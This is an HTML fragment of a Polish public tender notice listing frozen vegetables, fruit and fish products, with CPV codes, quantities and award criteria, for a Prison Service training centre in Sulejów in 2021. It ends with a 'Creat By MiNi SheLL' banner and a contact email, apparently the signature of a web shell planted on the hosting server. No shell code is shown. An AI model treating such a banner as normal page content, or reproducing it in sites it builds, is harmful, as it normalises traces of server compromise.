<br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najkrótszy czas wymiany towaru</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Dodatkowa dostawa o minimalnej kwocie od jakiej wykonawca zrealizuje zamówienie złożone przez zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Dostawy mrożonek dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach Oddział Zamiejscowy Sulejowie w 2021 r. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Podgrzybek mrożony 15331135-2	Kapelusze podgrzybka w całości, bez obcych smaków i zapachów, bez skaz, zanieczyszczeń, uszkodzeń mechanicznych, wolne od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	100 kg2	Maślak mrożony	15331135-2	Kapelusze maślaka krojone w kostkę, bez obcych smaków i zapachów, bez skaz, zanieczyszczeń, uszkodzeń mechanicznych, wolne od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	100 kg3	Różyczki kalafiorowe mrożone	15331170-9	Różyczki – część róży kalafiorowej, powstałej przez jej rozdzielenie na mniejsze części, z głąbikami przyciętymi do 20 mm, mierząc od nasady najniższego rozgałęzienia. Wielkość 15 do 35 mm; wygląd – różyczki, bez przerastających zielonych listków, bez uszkodzeń mechanicznych, bez zlepieńców trwałych, nieoblodzone, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze – pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	400 kg4	Brokuły różyczki mrożone	15331170-9	Różyczki – część róży brokułowej, powstałej przez jej rozdzielenie na mniejsze części, z głąbikami przyciętymi do 20 mm, mierząc od nasady najniższego rozgałęzienia. Wielkość 15 do 35 mm; wygląd – różyczki, bez przerastających zielonych listków, bez uszkodzeń mechanicznych, bez zlepieńców trwałych, nieoblodzone, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze – pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	350 kg5	Kapusta brukselka mrożona	15331170-9	Brukselka – kapusta, główki obrane z zewnętrznych liści, całe, bez uszkodzeń mechanicznych, zwarte, bez zlepieńców trwałych, nieoblodzone, główka koloru zielono-kremowego, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	200 kg6	Fasolka szparagowa cięta zamrożona 15331170-9	Fasolka zielona lub żółta, zamrożona, w postaci strąków ciętych; kształtne, niepołamane, sypkie, wolne od zlepieńców, bez skazy, barwa – intensywna zielona lub żółta, nie zbrązowiała, jednolita w całej masie partii, bez uszkodzeń przez choroby, szkodniki; konsystencja w stanie zamrożonym twarda, po ugotowaniu krucha, bez mączystych ziaren, nie gąbczasta, nie włóknista, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	220 kg7	Marchew typu junior mrożona 15331170-9	Marchew, średnica korzenia 10-15 mm, długość od 5 do 7 cm, bez uszkodzeń mechanicznych, bez obcego smaku i zapachu, bez skaz, jednolita odmiana w partii, wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	200 kg8	Marchew plastry mrożona 15331170-9	Marchew, poprzecznie krojona w karbowane plastry, średnica 20-30 mm, bez obcego smaku i zapachu, bez skaz, jednolita odmiana w partii, wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	200 kg9	Marchew kostka mrożona 15331170-9	Kostka marchwi 12-15 mm, bez uszkodzeń, bez obcego smaku i zapachu, bez skaz, wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	200 kg10	Groszek zielony mrożony 15331170-9	Groszek cały, bez uszkodzeń, bez obcego smaku i zapachu, bez skaz, wolny od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	80 kg11	Mieszanka warzywna 7-składnikowa mrożona	15331170-9	Skład: kalafior, fasolka szparagowa, marchew, pietruszka, groszek, por, seler; warzywa nieuszkodzone, bez obcego smaku i zapachu, mieszanka wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	120 kg12	Mieszanka chińska	15331170-9	Skład: marchew, papryka, kiełki fasoli Mung, grzyby chińskie Mun, kalafior, pędy bambusa, cebula, por; warzywa nieuszkodzone, bez obcego smaku i zapachu, mieszanka warzywna wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	150 kg13	Frytki karbowane	15331170-9	Ziemniaki rozdrobnione, pokrojone w kształt słupków, przeznaczone do pieczenia w piecu, bez obcych smaków i zapachów, bez skaz, zanieczyszczeń, uszkodzeń mechanicznych, frytki wolne od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45 kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	280 kg14	Mieszanka kompotowa	15896000-5	Skład: różne owoce, nie mniej niż cztery asortymenty. Opakowanie jednostkowe: torebka foliowa termozgrzewalna ok. 2,50 kg. Opakowanie zbiorcze: pudełko kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. 1800 kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, 15331135-2, 15331170-9, 15896000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najkrótszy czas wymiany wadliwego towaru</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Dodatkowa dostawa o minimalnej kwocie od jakiej wykonawca zrealizuje zamówienie złożone przez zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Dostawy ryb i konserw rybnych dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach Oddział Zamiejscowy Sulejowie w 2021 r. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Miruna mrożona	15220000-6 Filety całe, ze skórą, shatterpack (nie dopuszcza się JQF), bez obcych zanieczyszczeń, glazura techniczna maksymalnie do 5%, barwa mięsa charakterystyczna dla danego gatunku. Opakowania: pudła kartonowe od 6 kg do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy. 350 kg2	Morszczuk mrożony	15220000-6	Filety całe, bez skóry, bez obcych zanieczyszczeń, o nieregularnej wielkości i kształcie, płat mięsa oddzielony od pozostałych części anatomicznych ryby cięciem, wykonanym równolegle do kręgosłupa, tkanka mięsna jasna, o naturalnej barwie, charakterystycznej dla morszczuka. Nie dopuszcza się pozostałości wnętrzności, smaku obcego, lub gorzkiego i zapachu obcego lub jełkiego. Opakowania: pudła kartonowe od 6 kg do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy. 350 kg3	Śledzie solone matias	15230000-9	Filety całe bez obcych zanieczyszczeń, produkt o wysokich walorach smakowych, soczysty, o delikatnej teksturze i łagodnym smaku, barwa tkanki mięsnej jasna, biała do lekko kremowej; cechy dyskwalifikujące: filety rozpadające się, filety o luźnej konsystencji, przebarwienia świadczące o nieświeżości filetów. Opakowanie: wiaderko plastikowe. Waga netto od 2 kg do 4 kg .Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy. 80 kg4	Makrela wędzona tusza b/głowy	15234000-7	Makrela wędzona na gorąco, tusze o wadze 250-300 g ułożone w kartonie równolegle; cechy dyskwalifikujące: zapleśnienia na powierzchni, uszkodzenia mechaniczne, zanieczyszczenia lub uszkodzenia przez szkodniki, smak i zapach jełki, gorzki, pleśni, gnilny, tekstura tkanki mięsnej mazista. Opakowanie: pudło kartonowe od 2 do 10 kg. Termin przydatności do spożycia nie krótszy niż 7 dni od daty dostawy.	90 kg5	Filet z makreli w pomidorach	15240000-2	Konserwa rybna sterylizowana: filety z makreli (nie mniej niż 50%), sos pomidorowy (woda, koncentrat pomidorowy, cukier, maka pszenna, olej roślinny, ziemniak, przyprawy, mąka ziemniaczana, substancja wzmacniająca smak i zapach – glutaminian sodu, ocet, marchew, seler, cebula, sól, kwas octowy. Opakowanie jednostkowe: puszka łatwo otwieralna, waga ok. 175 g. Termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy.	140 kg6	Szprot w oleju	15240000-2	Konserwa rybna; skład: szprot minin. 60 %, olej roślinny, woda, sól, przyprawy. Opakowanie jednostkowe: puszka łatwo otwieralna, waga ok. 170 g . Termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy.	140 kg7	Paprykarz rybny 15240000-2	Konserwa rybna; skład: rozdrobnione mięso ryb minim. 31%, woda, koncentrat pomidorowy, marchew, ryż, cebula smażona, mąka ryżowa, olej roślinny, sól, przyprawy. Opakowanie jednostkowe: puszka, waga od 160 g do 350 g. Termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy.	120 kg8	Tuńczyk w oleju	15241400-3	Konserwa rybna; skład: duże kawałki tuńczyka, olej słonecznikowy, woda, sól. Opakowanie jednostkowe:puszka otwierana za pomocą otwieracza, waga ok. 170 g. Termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy.	80 kg9	Paluszki rybne	15241700-6	Filety z ryb białych w panierce w kształcie podłużnej kostki o wymiarach ok. 20x30x70 mm, bez obcych zanieczyszczeń. Opakowania: pudła kartonowe od 2 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	160 kg10	Ryba z pieca	15242000-6	Filet z mintaja minim. 50%, szpinak minim. 9 %, woda, mąka pszenna, śmietana, oleje roślinne, ser, cebula, masło, sól, aromat, drożdże, skrobia ziemniaczana, kwasy, sole eliminujące barwnik, betakaroten, czosnek, laktoza. Opakowania: pudła kartonowe od 2 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	280 kg11	Śledź po kaszubsku	15243000-3	Zawartość filetów w produkcie minim. 50%, przypraw 10% w zalewie aromatyczno-korzennej (pomidorowej), o konsystencji zawiesistej, filety całe, bez obcych zanieczyszczeń, produkt o wysokich walorach smakowych, soczysty o delikatnej teksturze i łagodnym smaku, barwa tkanki mięsnej jasna, biała do lekko kremowej; cechy dyskwalifikujące: filety rozpadające się, przebarwienia świadczące o nieświeżości filetów, niedopuszczalny zapach zjełczały, gnilny, chemiczny, stęchły lub inny obcy, niedopuszczalna mazista lub twarda tekstura mięsna. Opakowanie: wiaderko plastikowe. Waga netto od 2kg do 4 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	100 kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, 15220000-6, 15230000-9, 15234000-7, 15240000-2, 15241400-3, 15241700-6, 15242000-6, 15243000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najkrótszy czas wymiany wadliwego towaru</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Dodatkowa dostawa o minimalnej kwocie od jakiej wykonawca zrealizuje zamówienie złożone przez zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com